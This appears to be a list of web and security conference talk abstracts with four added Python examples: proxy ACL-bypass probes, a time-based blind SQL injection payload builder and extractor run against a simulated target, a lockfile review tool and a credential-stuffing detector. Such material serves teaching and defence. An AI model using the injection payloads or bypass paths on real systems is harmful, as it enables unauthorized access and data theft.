Workshop slides originally given at the WOPR Summit in Atlantic City: using JavaScript parsers and generators like Shift, combined with Puppeteer and Chrome, to reverse engineer web applications.
This document discusses monitoring Apache Kafka clusters and applications with Prometheus. It provides an overview of the architecture used, including deploying Prometheus servers, Kafka and HBase exporters, and a JSON exporter for YARN applications. Specific exporters are discussed for Kafka brokers using JMX, Kafka clients using the Prometheus Java library, and exposing application metrics via HTTP. Important Prometheus configurations and query functions are also covered.
A quick intro to using the Python micro framework Flask. Building a simple multiple page website from the ground up.
This document provides an overview of Flask, a microframework for Python. It discusses that Flask is easy to code and configure, extensible via extensions, and uses Jinja2 templating and SQLAlchemy ORM. It then provides a step-by-step guide to setting up a Flask application, including creating a virtualenv, basic routing, models, forms, templates, and views. Configuration and running the application are also covered at a high level.
This document provides an outline for a presentation on pentesting web applications with Burp Suite. It discusses using Burp Suite to scope a target, map content through spidering and directory bruteforcing, replace automated scanning with manual fuzzing using attack payload lists, and test authentication by bruteforcing logins. Specific techniques covered include using the Burp spider, intruder, and engagement tools to discover content and hidden directories, importing wordlists to bruteforce hidden paths, and configuring intruder payloads and grep rules to analyze results from fuzzing and authentication testing.
https://2018.zeronights.ru/en/reports/reverse-proxies-inconsistency/ Modern websites are growing more complex with different reverse proxies and balancers covering them. They are used for various purposes: request routing, caching, putting additional headers, restricting access. In other words, reverse proxies must both parse incoming requests and modify them in a particular way. However, path parsing may turn out to be quite a challenge due to mismatches in the parsing of different web servers. Moreover, request converting may imply a wide range of different consequences from a cybersecurity point of view. I have analyzed different reverse proxies with different configurations, the ways they parse requests, apply rules, and perform caching. In this talk, I will both speak about general processes and the intricacies of proxy operation and demonstrate the examples of bypassing restrictions, expanding access to a web application, and new attacks through the web cache deception and cache poisoning.
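The mismatch the talk describes can be simulated offline. The following is an added example, not code from the talk or from any proxy product: a naive prefix rule applied to the raw request target is compared with a backend that percent-decodes, collapses empty segments and resolves dot segments before routing. Whether a real proxy or backend decodes or normalizes at all depends on the product and its configuration, so treat the probe list and the denied prefix as constructed illustrations of the mismatch families, not as results for any specific server.

```python
from urllib.parse import unquote

DENIED_PREFIXES = ("/admin",)   # constructed ACL: the proxy must keep /admin private


def naive_proxy_allows(raw_path: str) -> bool:
    """ACL applied to the request target exactly as received, before any
    decoding. This is what a prefix rule does when the proxy matches the raw
    path and forwards it to the backend unchanged."""
    return not raw_path.startswith(DENIED_PREFIXES)


def backend_normalize(raw_path: str) -> str:
    """Canonical path a typical backend routes on: percent-decode, drop empty
    and '.' segments (so '//' and '/./' collapse), resolve '..' segments."""
    segments = []
    for seg in unquote(raw_path).split("/"):
        if seg in ("", "."):
            continue
        if seg == "..":
            if segments:
                segments.pop()
            continue
        segments.append(seg)
    return "/" + "/".join(segments)


def hardened_proxy_allows(raw_path: str) -> bool:
    """The fix: apply the rule to the same canonical form the backend will
    route on, so proxy and backend can no longer disagree."""
    return not backend_normalize(raw_path).startswith(DENIED_PREFIXES)


def find_acl_bypasses(raw_paths, allows=naive_proxy_allows) -> list:
    """Requests the proxy lets through that the backend nevertheless resolves
    into a denied location."""
    return [p for p in raw_paths
            if allows(p) and backend_normalize(p).startswith(DENIED_PREFIXES)]


# Constructed request targets; the first three are the classic mismatch families.
PROBES = [
    "/%61dmin",          # percent-encoded 'a': the raw string is not "/admin"
    "/static/../admin",  # dot segment that the proxy compares literally
    "//admin",           # an extra slash defeats a literal prefix match
    "/admin/users",      # plain request: both sides agree it is denied
    "/login",            # plain request: both sides agree it is allowed
]


def cache_deception_risk(raw_path: str,
                         dynamic_prefixes=("/account",),
                         static_ext=(".css", ".js", ".png")) -> bool:
    """Web cache deception, reduced to its two ingredients: a cache that decides
    cacheability from the file extension, and a backend that routes on the
    leading segments and ignores a bogus trailing segment. When both hold for
    one request, a per-user page ends up in the shared cache."""
    canonical = backend_normalize(raw_path)
    looks_static = canonical.lower().endswith(static_ext)
    routed_dynamic = canonical.startswith(dynamic_prefixes)
    return looks_static and routed_dynamic
```

Running `find_acl_bypasses(PROBES)` with the naive rule reports the three encoded, traversal and double-slash variants; with `hardened_proxy_allows` the list is empty, because the decision is made on the normalized path. The cache check is the same idea applied to the caching layer instead of the ACL.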
This is a bug bounty hunter presentation given at Nullcon 2016 by Bugcrowd's Faraz Khan. Learn more about Bugcrowd here: https://bugcrowd.com/join-the-crowd
Basics of Node.js and where it is being used currently. Some introductory examples are also included in the presentation to get started.
Docker has created enormous buzz in the last few years. Docker is an open-source software containerization platform. It provides an ability to package software into standardised units for software development. In this hands-on introductory session, I introduce the concept of containers, provide an overview of Docker, and take the participants through the steps for installing Docker. The main session involves using the Docker CLI (Command Line Interface) - all the concepts such as images, managing containers, and getting useful work done are illustrated step-by-step by running commands.
This document provides an introduction to PHP, including: - What scripting languages and PHP are, and how PHP works as a server-side scripting language - The history and origins of PHP - How to set up a PHP development environment using XAMPP - PHP programming fundamentals like syntax, operators, and control structures - How to handle forms and files in PHP - How to connect to and manipulate databases like MySQL from PHP - Several tasks as examples of working with forms, files, and databases in PHP
The document discusses web application security and provides an overview of common vulnerabilities like SQL injection, cross-site scripting (XSS), and cross-site request forgery (CSRF). It summarizes the OWASP Top 10 list of most critical web app security risks, including injection flaws, broken authentication, sensitive data exposure, and more. The document also offers best practices for developing more securely, like using prepared statements, validating and sanitizing input, and implementing authentication and session management properly.
Presentation from LevelUp 0x03 conference - https://forum.bugcrowd.com/t/levelup-0x03-aem-hacker-approaching-adobe-experience-manager-webapps-in-bug-bounty-programs-by-0ang3el/
This is a talk on how you can monitor your microservices architecture using Prometheus and Grafana. This has easy to execute steps to get a local monitoring stack running on your local machine using docker.
This document discusses injection vulnerabilities like SQL, XML, and command injection. It provides examples of how injection occurs by mixing commands and data, including accessing unauthorized data or escalating privileges. The speaker then discusses ways to prevent injection, such as validating all user input, using prepared statements, adopting secure coding practices, and implementing web application firewalls. The key message is that applications should never trust user input and adopt defense in depth techniques to prevent injection vulnerabilities.
Nginx is an open-source, lightweight web server that can serve static files, act as a reverse proxy, load balancer, and HTTP cache. It is fast, scalable, and improves performance and security for large websites. Some key companies that use Nginx include Google, IBM, LinkedIn, and Facebook. Nginx follows a master/worker process model with an event-driven, asynchronous, and non-blocking design. The master process manages worker processes that each handle many connections on a single thread, improving concurrency.
The presentation provides an overview of what Web Services are, why we need Web Services, and the features of SOAP and RESTful Web Services.
Frans Rosén of detectify discusses SQL injection techniques through a SOAP webservice. He provides steps to create a proof of concept attack with as few requests as possible to find vulnerable storefronts. Examples are given of time-based SQL injection payloads using substring, ascii, and sleep functions to retrieve the username and potentially other information about the target host. A link is also provided to a paper on SQL injection optimization and obfuscation techniques.
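The "as few requests as possible" goal above comes down to how the time-based oracle is queried. The following is an added example and not Frans Rosén's code: it builds MySQL-style `SUBSTRING`/`ASCII`/`SLEEP` conditions like the ones the talk describes and extracts a value with a binary search over the character code, so each character costs exactly seven requests instead of up to 95 when guessing printable characters one at a time. The target is a simulated endpoint with a constructed secret (`root@localhost`) that returns the delay the request would have incurred instead of actually sleeping; against a real host the caller would measure wall-clock response time and allow for network jitter.

```python
import re


class SimulatedTarget:
    """Stands in for the vulnerable SOAP endpoint. It 'executes' the injected
    condition against a constructed secret and returns the seconds the request
    would have taken; a real attacker measures the wall-clock response time."""
    SECRET = "root@localhost"   # constructed: what SELECT USER() might return
    PATTERN = re.compile(
        r"SUBSTRING\(\(SELECT USER\(\)\),(\d+),1\)\)>(\d+),SLEEP\((\d+)\)")

    def __init__(self):
        self.requests = 0

    def send(self, injected_value: str) -> float:
        self.requests += 1
        m = self.PATTERN.search(injected_value)
        if not m:
            return 0.05
        pos, threshold, delay = (int(g) for g in m.groups())
        # MySQL semantics: SUBSTRING past the end yields '' and ASCII('') is 0.
        code = ord(self.SECRET[pos - 1]) if pos <= len(self.SECRET) else 0
        return float(delay) if code > threshold else 0.05


def payload(pos: int, threshold: int, delay: int = 3) -> str:
    """Time-based condition in the MySQL dialect the talk uses: sleep only when
    the character at `pos` has an ASCII code above `threshold`."""
    return (f"' AND IF(ASCII(SUBSTRING((SELECT USER()),{pos},1))>{threshold},"
            f"SLEEP({delay}),0)-- -")


def extract_char(target, pos: int, delay: int = 3) -> int:
    """Binary search over codes 0..127: the interval halves on every request,
    so exactly 7 requests recover one character."""
    lo, hi = 0, 127
    while lo < hi:
        mid = (lo + hi) // 2
        # Treat anything at least half the requested delay as 'slept', which
        # leaves headroom for network jitter on a real target.
        if target.send(payload(pos, mid, delay)) >= delay / 2:
            lo = mid + 1        # the server slept, so the code is above mid
        else:
            hi = mid
    return lo


def extract(target, max_len: int = 64) -> str:
    """Recover the string character by character until the oracle reports
    code 0, which is what ASCII('') returns past the end of the value."""
    chars = []
    for pos in range(1, max_len + 1):
        code = extract_char(target, pos)
        if code == 0:
            break
        chars.append(chr(code))
    return "".join(chars)
```

For the 14-character constructed secret the extraction issues 105 requests: seven per character plus seven for the terminating probe that detects the end of the string.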
Introduction to Ansible. This is a tutorial based ppt, that can be used while conducting a workshop at any conference.
A beginner's guide to annotation processing. In this talk that I gave at Droidcon Tel Aviv in 2016, I walk you through the process of building a custom annotation processor which mimics some of the behavior you may be familiar with from the popular Android library: Butter Knife.
This document provides a summary of creating a custom annotation processor called "Soup Ladle" that allows for view binding in Android with the @Bind annotation. It discusses defining the @Bind annotation, extending the AbstractProcessor class to process the annotation, scanning code for @Bind fields and their parent classes, and generating SoupLadle.java files with binding methods for each parent class. The goal is to allow easy one-line view binding like SoupLadle.bind(this) for learning purposes and as a simpler alternative to libraries like ButterKnife.
Practical Chaos Engineering will show how to start running chaos experiments in your infrastructure and will try to guide you through the principles of chaos engineering.
This document discusses building APIs with Swift, OpenAPI, and gRPC. It introduces protocol buffers for defining data structures, and gRPC for building APIs. It recommends using the gnostic tool to convert OpenAPI descriptions to protocol buffers for use with gRPC plugins. This allows building high-quality code generators in different languages by separating the generator from the API description parsing. The document provides examples of building gRPC APIs and clients in Swift.
Spoon is an open-source library that enables you to transform and analyze Java source code. Due to a complete and fine-grained Java metamodel, you can read and write the AST built by Spoon. In this talk, you'll see all strong concepts and API with an example. Then, you'll see how you can integrate this project in yours.
React Native allows developers to build mobile apps using React with native platform capabilities. It uses native components instead of web views, making apps feel and perform like native ones. The document discusses what React Native is, how to set up a development environment, build a basic app, add libraries, handle common errors, and React Native fundamentals like components, styles, layout, events, and touch handling.
Front-end development has an amazing assortment of libraries and tools, yet it can seem very complex and doesn't seem much fun. So we'll live code a ClojureScript application (with a bit of help from Git) and show how development doesn't have to be complex or slow. Through live evaluation, we can build a reactive, functional application. Why not take a look at a well designed language that uses modern functional & reactive concepts for building Front-End apps. You are going to have to transpile anyway, so why not use a language, libraries and tooling that is bursting with fun to use.
- The document discusses some of the author's criticisms of Scala, including its use of implicit parameters to configure runtime behavior, and lack of good support for asynchronous programming. - The author proposes some workarounds, like annotating imports to avoid implicit conflicts, and patching the compiler to add more information to Future exceptions. However, the ideal solution would be language changes or improvements to asynchronous abstractions like Async. - Overall, the author argues that Scala is not ideal for some use cases like asynchronous programming, but provides some workarounds people can use in the meantime. The best solutions require changes to the language and standard library.
The document discusses and compares two popular ActionScript frameworks: PureMVC and Robotlegs. It provides an overview of why frameworks are used, describes some common design patterns implemented in frameworks, and highlights key features and strengths/weaknesses of PureMVC and Robotlegs.
This document discusses how to test NodeJS applications using the Mocha testing framework, the Should assertion library, and Sinon for spies/stubs/mocks. It covers setting up Mocha and Should, writing synchronous and asynchronous tests, using hooks, the Should DSL for assertions, running and configuring tests, integrating Sinon, and measuring test coverage with node-jscoverage.
This document discusses using various technologies on Google App Engine including JIQL, GaeVFS, RESTlets, scheduled tasks, JRuby on Rails, task queues, XMPP, and Clojure. JIQL emulates a relational database on App Engine's Bigtable datastore. GaeVFS provides a virtual filesystem on Bigtable. RESTlets make RESTful web services easy to implement in Java on App Engine. Scheduled tasks allow for background processing via cron jobs. JRuby on Rails provides a way to run Ruby on Rails applications on App Engine. Task queues allow for asynchronous background processing. XMPP enables instant messaging and peer-to-peer applications. Clojure can also be used
This document provides an overview of Clojurescript presented by John Stevenson. It discusses how Clojurescript provides a pragmatic approach to functional programming using immutable data structures and pure functions. It also describes how Clojurescript interfaces with popular JavaScript frameworks like React and how it can help manage complexity and state changes in web applications. Additionally, the document provides examples of Clojurescript libraries and tools and discusses ways to get started with the Clojurescript environment and ecosystem.
It’s late 2016, so you probably have been using Java 8 goodies for a while: lambdas, Stream, Optional, new date API ‒ stuff which makes Java development much more pleasant. But the question is: do you know these tools well? I bet you said yes, because writing sweet Java 8 code is a piece of cake ‒ you’re using efficient, parallel streams and many lambdas, so what could possibly go wrong? Let me put this straight: most probably you’re doing something wrong. In this talk I won’t actually try to prove that you don’t know what you’re doing, on the contrary ‒ I’ll try to help you be a better programmer by pointing out a few mistakes you can make when writing Java 8 code (I know that because I made them all). I’ll also discuss a couple of common misconceptions regarding Stream and Optional and mention missing language features (and whether there is a chance to see them in Java 9, or which library you should use instead). Last but not least, I’ll present a number of lesser-known gems I found in the deepest corners of the JDK API, which, I hope, will make your life as a software developer a little bit easier.
How to write CLI apps for macOS using swift, which packages to use, common challenges to overcome, how to structure your CLI app code.
Greg Anderson's slide deck from BADCamp 2016. Having a fine-tuned continuous integration environment is extremely valuable, even for small projects. Today, there is a wide variety of standalone projects and online Software-As-A-Service offerings that can super-streamline your everyday development tasks that can help you get your projects up and running like a pro. In this session, we'll look at how you can get the most out of: - GitHub source code repository - Packagist package manager for Composer - Travis CI continuous integration service - Coveralls code coverage service - Scrutinizer static analysis service - Box2 phar builder - PhpDocumentor api documentation generator - ReadTheDocs online documentation reader service - Composer scripts and projects for running local tests and builds
The document discusses the future of server-side JavaScript. It provides reasons for using JavaScript on the server, including that it is the lingua franca of the web, allows for code reuse between server and client, and supports asynchronous programming well. It also discusses JavaScript engines, CommonJS modules and packages, environments like Node.js and RingoJS, and trends like wider adoption and cloud-based IDEs.
This document provides an agenda and summary for a workshop on developing MongoDB applications on OpenShift presented by Shekhar Gulati. The agenda includes getting started with OpenShift, developing a location-aware Java EE application using JAX-RS and CDI for REST services, and MongoDB for the database. The document discusses OpenShift, JAX-RS, CDI, and MongoDB concepts. It also outlines code samples and steps to create and deploy a sample Twitter-like application on OpenShift that supports creating, finding, and geo-searching statuses.
- Server applications written in Objective-C and GNUstep can take advantage of the GNUstep base libraries and Foundation framework to provide high-level object-oriented design and functionality while maintaining high performance comparable to C. - The GNUstep base libraries provide common classes for tasks like strings, collections, threading, notifications, and I/O that allow server code to be organized using object-oriented patterns. - Objective-C is well-suited for server applications because it is a strict superset of C, allowing seamless integration of C code and libraries, while also providing object-oriented features for high-level organization of server code.
- Server applications written in Objective-C and GNUstep-base can take advantage of the high-level object-oriented features of Objective-C while maintaining the performance and flexibility of C. - GNUstep-base provides the Foundation library, which includes classes for tasks like threading, networking, data storage and more that are useful for server applications. - Objective-C allows mixing C code for performance critical parts while organizing the overall application structure using object-oriented patterns supported by the GNUstep-base libraries.
- Lithium is an upcoming PHP framework that is lightweight and flexible - It uses MongoDB as its primary database and supports MySQL as well - The presentation covered the core functionality of Lithium including installation, models, controllers, views and provided examples of using it to build a blog application
This All Things Open 2022 talk shows how to use current-gen WebAssembly to build complex applications out of components.
This talk was given at AppSec California, January 2020. Credential stuffing and other automated attacks are evolving past every defense thrown in their way. CAPTCHAs don't work, fingerprints don't work, magical AI-whatevers don't work. The value is just too great.
Slides for talk given at PasswordsCon Sweden 2019. Credentials Stuffing is an automated attack that exploits users who reuse passwords by taking breached credentials and replaying them across sites.
This document summarizes an analysis of a compromised npm package called event-stream. It describes how an attacker gained control of the package and added malicious code that was downloaded by thousands of projects whenever their dependencies were updated. The malicious code stole cryptocurrency from wallets containing large amounts. It highlights the risks of supply chain attacks and emphasizes the importance of auditing dependencies, locking versions, and thinking carefully before adding new dependencies to avoid compromising entire projects and their users.
Jarrod Overson presented on a supply chain attack that occurred in 2018 through the compromise of the event-stream Node.js package. An unauthorized developer gained commit access and introduced malicious code through new dependencies that was then installed by millions of users. The malware harvested cryptocurrency private keys from the Copay wallet app. While the community responded quickly, such attacks demonstrate vulnerabilities in open source software supply chains and dependency management that will continue to be exploited if not properly addressed through changes to practices and tooling.
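The practices both summaries above call for, locking versions and auditing what a dependency update actually pulls in, can be mechanized against the lockfile. This is an added example, not code from either talk: it flattens two constructed npm v1 `package-lock.json` documents, reports packages that were added, removed or changed between them, flags entries without an `integrity` hash, and flags declared ranges in `package.json` that let `npm install` resolve to a version nobody reviewed. The version numbers mirror the incident (event-stream 3.3.4 moving to 3.3.6 and gaining a flatmap-stream 0.1.1 dependency) but the lockfiles, the `through` entry and the `sha512-PLACEHOLDER-*` hashes are constructed for the example.

```python
import json
import re

# Constructed lockfiles in the npm v1 layout. Integrity values are placeholders.
OLD_LOCK = json.loads("""{
  "name": "wallet-app", "lockfileVersion": 1,
  "dependencies": {
    "event-stream": {
      "version": "3.3.4", "integrity": "sha512-PLACEHOLDER-ES-3.3.4",
      "requires": {"through": "~2.3.1"},
      "dependencies": {
        "through": {"version": "2.3.8", "integrity": "sha512-PLACEHOLDER-THROUGH"}
      }
    }
  }
}""")

NEW_LOCK = json.loads("""{
  "name": "wallet-app", "lockfileVersion": 1,
  "dependencies": {
    "event-stream": {
      "version": "3.3.6", "integrity": "sha512-PLACEHOLDER-ES-3.3.6",
      "requires": {"through": "~2.3.1", "flatmap-stream": "^0.1.0"},
      "dependencies": {
        "through": {"version": "2.3.8", "integrity": "sha512-PLACEHOLDER-THROUGH"},
        "flatmap-stream": {"version": "0.1.1"}
      }
    }
  }
}""")

# Constructed manifest: a caret range is what let the newer release in.
PACKAGE_JSON = {"dependencies": {"event-stream": "^3.3.4", "express": "4.16.4"}}

EXACT_VERSION = re.compile(r"\d+\.\d+\.\d+(?:[-+][0-9A-Za-z.-]+)?")


def flatten(lock: dict, prefix: str = "") -> dict:
    """Map every installed package (written 'parent/child' when nested) to its
    pinned version and integrity hash, recursing through nested dependencies."""
    out = {}
    for name, meta in lock.get("dependencies", {}).items():
        path = f"{prefix}{name}"
        out[path] = (meta.get("version"), meta.get("integrity"))
        out.update(flatten(meta, prefix=f"{path}/"))
    return out


def floating_ranges(pkg: dict) -> dict:
    """Declared specs that are not an exact version, so a plain install can
    resolve to a release that was never reviewed."""
    return {name: spec
            for field in ("dependencies", "devDependencies")
            for name, spec in pkg.get(field, {}).items()
            if not EXACT_VERSION.fullmatch(spec)}


def review(old_lock: dict, new_lock: dict, pkg: dict) -> dict:
    """Everything a reviewer should look at before accepting a lockfile change."""
    old, new = flatten(old_lock), flatten(new_lock)
    return {
        "added": sorted(f"{p}@{new[p][0]}" for p in new.keys() - old.keys()),
        "removed": sorted(old.keys() - new.keys()),
        "changed": sorted((p, old[p][0], new[p][0])
                          for p in old.keys() & new.keys() if old[p][0] != new[p][0]),
        "missing_integrity": sorted(p for p, (_, integrity) in new.items() if not integrity),
        "floating": floating_ranges(pkg),
    }
```

The output for the constructed pair is one version change on event-stream, one brand-new transitive package with no integrity hash, and one caret range in the manifest. Each of those is a question to answer before merging, and installing from the lockfile with `npm ci` rather than `npm install` keeps the answer stable afterwards.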
Deepfakes originally started as cheap but believable video effects and have expanded into AI-generated content of every format. This session dug into the state of deepfakes and how the technology highlights an exciting but dangerous future.
Jarrod Overson discusses the evolution of credential stuffing attacks and where they may go in the future. He summarizes that credential stuffing started as basic automated login attempts but has evolved through generations as defenses were put in place, such as CAPTCHAs and behavior analysis. The next generation involves more sophisticated imitation attacks that flawlessly emulate human behavior using real device fingerprints to blend in. Beyond credential stuffing, malware may start scraping user accounts and environments directly from infected machines. As defenses raise the cost of attacks, fraudsters will diversify methods to preserve the value of valid accounts and user data.
OWASP RTP Presentation on Data breaches, credential spills, the lifespan of data, credential stuffing, the attack lifecycle, and what you can do to protect yourself or your users.
QCon SF 2016 security talk about who uses data from massive breaches (like Yahoo, Target), what tools they use, and what damage they inflict.
Shape Security analyzes 1.5 billion logins per week and protects 350 million user accounts. In 2016 alone, 1.6 billion credentials were leaked and sold or traded by criminals on dark web markets. Attackers use headless browsers like PhantomJS to automatically test leaked credentials against other sites; Shape reports stopping over $1 billion in fraud losses in 2016. However, captchas intended to prevent automated attacks do not work and ruin the user experience.
Talk given at Mozilla's first View Source Conference in Portland, 2015. Details out the parallels between graphics and game developments compared to traditional web development.
This document discusses the dark side of web security, including automated threats from bots and attackers. It notes that, like flossing, the effectiveness of traditional security measures is hard to measure. It outlines the OWASP top 10 vulnerabilities and the automated threats attackers use. While captchas are meant to stop bots, services have made bypassing captchas easy. If a site has value like money, data, or content, there is value in exploiting it. Detection of attacks is difficult as attackers use many proxies and fingerprints to avoid detection. Patching is not enough, and spikes in traffic from many IPs can indicate an attack.
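The detection signal the credential stuffing talks above keep returning to (a burst of login attempts spread across many IPs, almost all failing, each IP trying different usernames) can be checked with a few counters over the login log. This is an added example, not code from any of the talks or from Shape: the log lines are constructed in a simplified `key=value` format, one window of ordinary traffic and one window of a replayed breach list, and the thresholds are illustrative values rather than anything derived from real traffic. A production baseline would come from historical data, and, as the later talks note, the next generation of attacks lowers the rate and widens the IP pool specifically to slip under checks like this one.

```python
from collections import defaultdict


def constructed_log(kind: str) -> list:
    """Constructed login-audit lines: '<ts> ip=<addr> user=<name> result=<ok|fail>'."""
    lines = []
    if kind == "normal":
        # A handful of real users from a few addresses; retries and typos fail.
        for i in range(40):
            ip = f"198.51.100.{i % 6}"
            user = ["alice", "bob", "carol"][i % 3]
            result = "fail" if i % 5 == 0 else "ok"
            lines.append(f"2019-11-21T10:00:{i:02d}Z ip={ip} user={user} result={result}")
    else:
        # Replay of a breached list through a proxy pool: each attempt uses a
        # different username, nearly all fail, a few reused passwords hit.
        for i in range(400):
            ip = f"203.0.113.{i % 250}"
            result = "ok" if i % 100 == 0 else "fail"
            lines.append(f"2019-11-21T10:05:{i % 60:02d}Z ip={ip} user=user{i:04d} result={result}")
    return lines


def parse(line: str) -> dict:
    """Split one audit line into a record."""
    ts, *pairs = line.split()
    rec = dict(pair.split("=", 1) for pair in pairs)
    rec["ts"] = ts
    return rec


def window_stats(lines) -> dict:
    """Counters over one time window that separate stuffing from normal traffic."""
    recs = [parse(line) for line in lines]
    attempts = len(recs)
    fails = sum(r["result"] == "fail" for r in recs)
    users_by_ip = defaultdict(set)
    for r in recs:
        users_by_ip[r["ip"]].add(r["user"])
    return {
        "attempts": attempts,
        "fail_rate": fails / attempts if attempts else 0.0,
        "distinct_ips": len(users_by_ip),
        "distinct_users": len({r["user"] for r in recs}),
        # Stuffing tries each credential pair once, so users per attempt is near 1.
        "user_ratio": len({r["user"] for r in recs}) / attempts if attempts else 0.0,
    }


def is_credential_stuffing(stats: dict, baseline_attempts: int = 60,
                           max_fail_rate: float = 0.5, min_ips: int = 50,
                           min_user_ratio: float = 0.8) -> bool:
    """Flag a window that is busier than baseline, mostly failing, sourced from
    many addresses, and cycling through usernames rather than retrying one."""
    return (stats["attempts"] > baseline_attempts
            and stats["fail_rate"] > max_fail_rate
            and stats["distinct_ips"] >= min_ips
            and stats["user_ratio"] >= min_user_ratio)
```

The normal window fails the volume check alone (40 attempts, 20% failures, 6 addresses, 3 users); the attack window trips every condition (400 attempts, 99% failures, 250 addresses, a different username on every attempt). Any one of the four signals on its own is noisy, which is why they are combined.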
This was a talk given at HTML5DevConf SF in 2015. Ever wanted to write your own Browserify or Babel? Maybe have an idea for something new? This talk will get you started understanding how to use a JavaScript AST to transform and generate new code.
This document discusses ECMAScript 2015 (ES2015), also known as ES6. It provides examples of new ES2015 features like arrow functions, template literals, classes, and modules. It also discusses how to set up a development environment to use ES2015, including transpiling code to ES5 using Babel, linting with Eslint, testing with Mocha, and generating coverage reports with Istanbul. The document emphasizes that while ES2015 is fun to explore, proper tooling like linting and testing is needed for serious development. It concludes by noting ES2015 marks a transition and thanks the audience.
The document discusses achieving maintainability in code through examining code quality with linters, generating visual reports on metrics like complexity and coverage, and automating processes like builds, linting, and testing through tools like Grunt and Gulp. It emphasizes setting limits on metrics like complexity, enforcing code style through automation, and treating documentation as important as code.
1) The document discusses achieving maintainability in code through analysis, automation, and enforcement of standards. 2) It recommends setting up linting, code coverage, and other analysis tools to examine code quality and automatically enforcing code style through build processes. 3) The key is to automate as many processes as possible like testing, linting, and documentation to make the code easy to work with and prevent issues from being introduced.
Slides for the keynote given at QCon Sao Paulo 2014. Talk goes into the problems scaling Riot and how we've tried to solve them as well as what we've learned from the web and what lies in store next.